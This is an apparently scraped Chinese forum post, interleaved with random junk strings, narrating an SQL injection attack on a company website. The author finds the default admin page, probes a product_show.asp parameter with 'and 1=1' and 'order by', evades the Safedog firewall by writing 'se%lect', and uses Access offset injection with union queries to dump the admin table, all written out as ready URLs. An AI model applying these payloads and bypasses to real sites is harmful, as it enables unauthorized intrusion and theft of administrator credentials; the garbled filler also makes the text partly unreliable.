打开网站,一个企业站。
* h5 p3 Z* D: I& F. a6 r9 `
t; i3 ?, ?2 W1 L1 q& ?$ c2 V5 x
顺手加个admin4 r8 w$ B" [3 K7 b1 _1 w) i
# x) M8 s2 V5 D7 @
* E9 U9 P4 p: m8 c* I" ?
默认后台。0 z. L1 p( g+ J' [8 d
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
- Y, h1 O: i7 z; ^9 d7 ~7 Z8 G
* T8 v, o2 _: v* J( _
" T0 _: k! @2 c5 f( k. s2 C m& Q2 i1 M6 K. c3 A2 J
所以就不用御剑扫了,待会直接封IP。
+ H: ?5 t b! s' k. `: D) i ^ s0 Y* Q! ]
用order by语句判断是否存在注入。- u/ U/ Y+ Y& T2 Z; l
http://www.xxx.com /product_show.asp?id=997 order by 13 _" N1 g8 G6 X; s% S+ W2 u
http://www.xxx.com /product_show.asp?id=997 order by 100
& K6 t1 t- X3 j! D现在存在注入,经测试后发现是9个字段。0 Z+ ]9 }$ Z& O1 r! `/ ~
2 [. C& A: ^8 ^
接下来进行联合查询,猜是否存在admin表。
: W: e+ F$ L% H) |1 ahttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
$ ~3 q1 p8 w! J7 i D4 q: W
* T b. g8 o2 v& B' I3 U% x. Y, L/ ]4 y _
5 ]( l! ]# }8 Y/ B" I4 Q) C0 d: \, l# ^
在select中间加个%,se%lect绕过安全狗。* N6 G2 k1 y& r
R4 p. e4 `" w9 {1 v ~! _7 C. R
2 i. Z4 Z) D/ J+ N
发现存在admin表,然后开始手工猜常用的字段。; X/ Q% G2 U+ R2 u r! o# b
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。1 H; T3 F ]+ l# V4 X+ A+ y
+ y: J, X$ A7 q$ ~
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
$ |- @2 e y0 H* R) H# Z1 W ~
( H9 F) G/ R2 \! o4 q* X9 Y+ s$ E科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
' W! t, W) N2 D; [- v& a; khttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
* f( N! U% w/ a9 ?好了,敏感内容出显了。! i4 W* Z, Y+ k" o# `: a' u
, h' J6 v& X' K# \' G
9 n, ?* n7 i0 c" g; ?& n* C; A8 D3 C. C8 _+ U1 C0 ~0 D v2 @* R" ?
|